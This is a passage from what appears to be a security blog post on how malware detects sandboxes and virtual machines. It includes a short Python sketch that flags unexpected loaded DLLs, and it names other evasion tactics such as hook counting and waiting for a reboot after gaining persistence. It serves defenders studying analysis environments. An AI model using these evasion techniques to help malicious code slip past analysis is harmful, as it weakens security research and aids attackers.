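The original C# listing is not reproduced here. A minimal Python sketch of the same comparison follows; the fingerprint contents, the sample module paths, and the helper unexpected_modules are hypothetical, and enumerating the modules actually loaded into a process is left out because it is platform-specific.

```python
import ntpath

# Hypothetical fingerprint: DLL names recorded on a clean run of the program.
KNOWN_DLLS = frozenset({"ntdll.dll", "kernel32.dll", "user32.dll", "advapi32.dll"})


def check_name(name_of_loaded_dll, fingerprint=KNOWN_DLLS):
    """Return True if the loaded DLL belongs to the program's known fingerprint."""
    # ntpath handles Windows-style paths regardless of where this script runs.
    return ntpath.basename(name_of_loaded_dll).lower() in fingerprint


def unexpected_modules(loaded_modules, fingerprint=KNOWN_DLLS):
    """Return every loaded module that is not part of the fingerprint."""
    return [m for m in loaded_modules if not check_name(m, fingerprint)]


# Hypothetical module list, as it might look inside a monitored process.
loaded = [
    r"C:\Windows\System32\ntdll.dll",
    r"C:\Windows\System32\KERNEL32.DLL",
    r"C:\analysis\monitor_renamed.dll",
]
print(unexpected_modules(loaded))
```

Because the comparison is against what the program expects to see, not against a list of known monitoring DLL names, renaming the injected DLL does not help.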

This simple function is enough to catch many sandboxes (again, not all of them), even if you’ve followed their best practices and renamed their monitoring dll (typically injected into all new processes). Other examples of sandbox detection include using the hook detection employed by numerous security programs to find malware (except in this case – used by malware to detect sandboxes), counting hooks, etc.

Unfortunately, in the case of sandboxes, malware doesn’t even need to go through all that trouble to defeat them. The only thing malware needs to do is ensure its persistence through a reboot, then wait for a reboot to take place. That alone is enough to defeat the analysis steps of most sandboxes!

Summary

 

In short, you have seen that while many people quibble over VM detection being as simple as looking for registry keys and MAC addresses (all easily mitigated from a security perspective), VM detection is actually:

  1. Much easier than programmatically dealing with the registry
  2. Much harder [nearly impossible] to mitigate when behavior of hardware is the target of testing
  3. Happening on a massive scale in malware in the wild

 

While the use of Virtual Machines has many advantages for research purposes, their selection and limitations should be carefully weighed against your actual objectives.

Gary Golomb
